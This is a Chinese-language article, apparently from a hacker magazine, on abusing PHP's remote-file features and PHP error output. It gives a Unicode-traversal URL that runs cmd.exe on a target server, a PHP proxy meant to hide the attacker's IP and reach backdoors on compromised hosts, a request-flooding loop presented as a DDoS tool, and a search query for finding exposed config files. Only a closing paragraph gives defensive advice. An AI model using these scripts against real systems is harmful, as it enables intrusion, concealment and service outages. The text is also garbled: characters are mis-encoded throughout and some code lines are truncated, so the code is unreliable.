1.遠(yuǎn)程文件

　　PHP是一門具有豐富特性的語言，它提供了大量函數(shù)，使程序員能夠方便地實(shí)現(xiàn)各種功能，遠(yuǎn)程文件就是一個(gè)很好的例子：

　　代碼

　　$fp=@Fopen($url,"r") or die ("cannot open $url");

　　while($line=@fgets($fp,1024)) {

　　$contents.=$line;

　　}

　　echo $contents; //顯示文件內(nèi)容

　　fclose($fp); //關(guān)閉文件

　　?>

　　以上是一段利用Fopen函數(shù)打開文件的代碼，由于Fopen函數(shù)支持遠(yuǎn)程文件，使得它應(yīng)用起來相當(dāng)有趣，將以上代碼保存為Proxy.php，然后后提交：

　　代碼

　　/proxy.php?url=http://www.hacker.com.cn/bbs

　　這時(shí)候你會(huì)發(fā)現(xiàn)論壇下方顯示的IP地址變成了PHP腳本所處服務(wù)器的IP地址。Fopen函數(shù)可以從任何其Web或FTP站點(diǎn)讀取文件，事實(shí)上PHP的大多數(shù)文件處理函數(shù)對(duì)遠(yuǎn)程文件都是透明的，比如請(qǐng)求：

　　代碼

　　/proxy.php?url=http://target/ｓｃｒｉｐｔ/..%c1%1c../winnt/system32/cmd.exe?/c+dir

　　這樣實(shí)際上是利用了Target主機(jī)上的Unicode漏洞，執(zhí)行了DIR命令。但并不是所有的服務(wù)器都支持遠(yuǎn)程文件的功能，如果你使用的是商業(yè)的服務(wù)器，很可能會(huì)發(fā)現(xiàn)遠(yuǎn)程文件使用不了(如51的虛擬主機(jī))，這是因?yàn)樵谏虡I(yè)主機(jī)上限制遠(yuǎn)程文件的功能，往往能夠更好的保護(hù)服務(wù)器的正常運(yùn)行。你可以通過PHPinfo()查看服務(wù)器是否支持這種功能。當(dāng)然，在PHPinfo()被禁用的情況下，也可以使用Get_cfg_var()：

　　代碼

　　echo "是否允許使用遠(yuǎn)程文件(allow_url_Fopen)";

　　?php

　　if (get_cfg_var("allow_url_Fopen")=="1")

　　{

　　echo("是");

　　}

　　else echo("否");

　　?>

　　當(dāng)Allow_url_Fopen一項(xiàng)參數(shù)為ON時(shí)，即支持遠(yuǎn)程文件的功能。充分發(fā)揮遠(yuǎn)程文件的特性，我們可以實(shí)現(xiàn)許多特殊的功能：如果你是用過PHP Flame的最新版本，你會(huì)發(fā)現(xiàn)它在集文件夾復(fù)制、文本搜索等功能的基礎(chǔ)上，又增加了Web間文件傳輸?shù)墓δ埽揽窟@種功能，你可以隨意將其他服務(wù)器上的文件傳送到你的Web目錄下。而且，在兩臺(tái)服務(wù)器間傳送文件有著飛快的傳輸速度。我們看看實(shí)現(xiàn)這個(gè)功能的代碼：

　　代碼

　　$fp = Fopen($_GET['filename'], 'rb'); //打開文件

　　$data = $tmp = '';

　　while ( true ) {

　　$tmp = fgets($fp, 1024);

　　if ( 0 === strlen($tmp) ) {

　　break; //跳出while循環(huán)

　　}

　　$data .= $tmp;

　　}

　　fclose($fp); //關(guān)閉文件

　　$file=preg_replace("/^.+//","",$filename);//轉(zhuǎn)換文件名

　　//write

　　$fp = Fopen("$file", 'wb'); //生成文件

　　fwrite($fp, $data); //寫入數(shù)據(jù)

　　fclose($fp);

　　?>

　　在調(diào)用Fopen和Fwrite函數(shù)時(shí)加入"b"標(biāo)記，可以使這兩個(gè)函數(shù)安全運(yùn)用于二進(jìn)制文件而不損壞數(shù)據(jù)。在以上腳本提交：

　　/down.php?filename=http://www.chinaz.com/winrar.zip

　　這時(shí)便會(huì)在Down.php的所處目錄下生成相應(yīng)的Winrar.zip文件。如果再配合遍歷目錄的功能，你將可以實(shí)現(xiàn)多個(gè)文件夾服務(wù)器間的傳輸。但是，遠(yuǎn)程文件應(yīng)該還有更大的發(fā)揮空間，比如寫SQL Injection攻擊的自動(dòng)腳本，甚至是HTTP的代理服務(wù)：

　　代碼

　　$url = getenv("QUERY_STRING");

　　if(!ereg("^http",$url)) //檢查輸入的URL格式

　　{

　　echo "例子：
http://www.163.com/
";

　　echo "http://www.xxxx.com/list.php?id=600
";

　　echo "當(dāng)URL為目錄時(shí)需要在目錄后加入"/"";

　　exit;

　　}

　　if($url)

　　$url=str_replace("\","/",$url);

　　$f=@Fopen($url,"r"); //打開文件

　　$a="";

　　if($f)

　　{

　　while(!feof($f))

　　$a.=@fread($f,8000); //讀取文件

　　fclose($f);

　　}

　　$rooturl = preg_replace("/(.+/)(.*)/i","\1",$url); //轉(zhuǎn)換根目錄

　　$a = preg_replace("/(src[[:space:]]*=['"])([^h].*?)/is","\1$rooturl\2",$a);

　　$a = preg_replace("/(src[[:space:]]*=)([^h'"].*?)/is","\1$rooturl\2",$a); //轉(zhuǎn)換圖片地址

　　$a = preg_replace("/(action[[:space:]]*=['"])([^h].*?)/is","\1$php_self?$rooturl\2",$a);

　　$a = preg_replace("/(action[[:space:]]*=)([^h'"].*?)/is","\1$php_self?$rooturl\2",$a); //轉(zhuǎn)換POST地址

　　$a = preg_replace("/(

　　$a = preg_replace("/(

　　$a = preg_replace("/(link.+?href[[:space:]]*=[^'"])(.*?)/is","\1$rooturl\2",$a);

　　$a = preg_replace("/(link.+?href[[:space:]]*=['"])(.*?)/is","\1$rooturl\2",$a); //轉(zhuǎn)換樣式表地址

　　echo $a;

　　exit;

　　?>

　　在正則表達(dá)式的幫助下，以上代碼能夠自行地將返回頁面中包含的鏈接和圖片進(jìn)行轉(zhuǎn)換，并把頁面內(nèi)的鏈接自動(dòng)提交到當(dāng)前PHP腳本的$url中。例如提交：

　　/proxy.php?http://www.xfocus.net/

　　腳本將會(huì)返回http://www.xfocus.net/的內(nèi)容，如圖1所示。

　　圖1

　　當(dāng)然，這運(yùn)用的絕對(duì)不僅僅是框架的技巧。運(yùn)用這個(gè)腳本你可以遠(yuǎn)程操作安置在其他服務(wù)器的Web后門，或者將肉雞做成一個(gè)簡(jiǎn)單的HTTP代理，從而更好的隱藏自己的IP。如果使用PHP編寫CGI掃描工具，你需要延長(zhǎng)PHP的有效運(yùn)行時(shí)間。以下是兩種有效的方法，當(dāng)然你也可以將PHP代碼編譯成GUI界面，從而解決這個(gè)問題。設(shè)置PHP的有效運(yùn)行時(shí)間為三分鐘：

　　代碼

　　我們?cè)倏纯催@種功能在DDOS攻擊中的應(yīng)用：

　　代碼

　　set_time_limit(60*3);

　　$url="http://www.xxx.com/bbs/userlist.php?userid=";

　　for($i=1131;$i<=1180;$i++)

　　{

　　$urls=$url.$i; //將$url與$i鏈接在一起

　　$f=@Fopen($urls,"r"); //請(qǐng)求$urls

　　$a=@fread($f,10); //取出部分內(nèi)容

　　fclose($f); //關(guān)閉$urls

　　}

　　?>

　　以上用For循環(huán)不斷地請(qǐng)求Userlist.php?userid=$i的內(nèi)容($i的值每次都是不同的)，但是打開后僅僅取出幾個(gè)字節(jié)便關(guān)閉這個(gè)腳本了。PHP運(yùn)行在虛擬主機(jī)上，10秒鐘便可以打開幾十個(gè)URL，當(dāng)同時(shí)運(yùn)行多個(gè)進(jìn)程時(shí)，便有可能實(shí)現(xiàn)DDOS攻擊，讓對(duì)方的論壇迅速崩潰。

　　限于版面，遠(yuǎn)程文件的內(nèi)容就先說到這里了，如果你還有不明白的地方，請(qǐng)參考以下的這篇文章：《在PHP中使用遠(yuǎn)程文件》

　　2.錯(cuò)誤回顯

　　PHP在默認(rèn)的情況下打開錯(cuò)誤回顯，這樣可以便于程序員在調(diào)試腳本時(shí)發(fā)現(xiàn)代碼的錯(cuò)誤，但是這也往往使Web暴露了PHP的代碼和服務(wù)器的一些數(shù)據(jù)。PHP對(duì)代碼的規(guī)范性要求比較嚴(yán)格，以下是一種比較常見的錯(cuò)誤回顯：

　　warning:file("data/1120'.htm)-no such file or

　　directory in /usr/home/xxxxx.com/show.php on line 300

　　這種錯(cuò)誤回顯，至少告訴了我們?nèi)齻€(gè)信息：服務(wù)器的操作系統(tǒng)是LINUX;服務(wù)器使用文本數(shù)據(jù)庫;Show.php的第300行代碼為"file ("./data/1120/".$data.".htm")"。

　　這種錯(cuò)誤回顯，已經(jīng)足以成為一臺(tái)服務(wù)器致命的漏洞。從另一個(gè)利用的角度來看，我們發(fā)現(xiàn)一般的PHP錯(cuò)誤回都包含了"warning"字符，但是這有什么用呢?我們得先認(rèn)識(shí)一下PHP的庫文件。

　　PHP的Include()和Require()主要是為了支持代碼庫，因?yàn)槲覀円话闶前岩恍┙?jīng)常使用的函數(shù)放到一個(gè)獨(dú)立的文件中，這個(gè)獨(dú)立的文件就是代碼庫，當(dāng)需要使用其中的函數(shù)時(shí)，我們只要把這個(gè)代碼庫包含到當(dāng)前的文件中就可以了。

　　最初，人們開發(fā)和發(fā)布PHP程序的時(shí)候，為了區(qū)別代碼庫和主程序代碼，一般是為代碼庫文件設(shè)置一個(gè)".inc"的擴(kuò)展名，但是他們很快發(fā)現(xiàn)這是一個(gè)錯(cuò)誤，因?yàn)檫@樣的文件無法被PHP解釋器正確解析為PHP代碼。如果我們直接請(qǐng)求服務(wù)器上的這種文件時(shí)，我們就會(huì)得到該文件的源代碼，這是因?yàn)楫?dāng)把PHP作為Apache的模塊使用時(shí)，PHP解釋器是根據(jù)文件的擴(kuò)展名來決定是否解析為PHP代碼的。擴(kuò)展名是站點(diǎn)管理員指定的，一般是".php"， ".php3"和".php4"。如果重要的配置數(shù)據(jù)被包含在沒有合適的擴(kuò)展名的PHP文件中，那么遠(yuǎn)程攻擊者將容易得到這些信息。

　　按照以往的程序員的習(xí)慣，往往會(huì)把一些重要的文件設(shè)定"config.inc","coon.inc"等形式，如果我們?cè)谒阉饕龘闹兴阉?quot;warning+config.inc"，那么你會(huì)發(fā)現(xiàn)許多網(wǎng)站都暴露了".inc"文件的代碼，甚至包括許多商業(yè)和政府網(wǎng)站，如圖2所示。

　　圖2

　　要關(guān)閉PHP的錯(cuò)誤回顯通常有兩個(gè)方法，第一個(gè)是直接修改Php.ini中的設(shè)置，這我們以前已經(jīng)介紹過了;第二種方法是在PHP腳本中加入抑制錯(cuò)誤回顯的代碼，你可以在調(diào)用的函數(shù)前函數(shù)加入"@"字符，或者在PHP的代碼頂端加入"error_reporting(0);"的代碼，要了解更多的內(nèi)容請(qǐng)參考PHP手冊(cè)中的"error_reporting"一節(jié)。

(本文由責(zé)任編輯 pasu 整理發(fā)布)

最新評(píng)論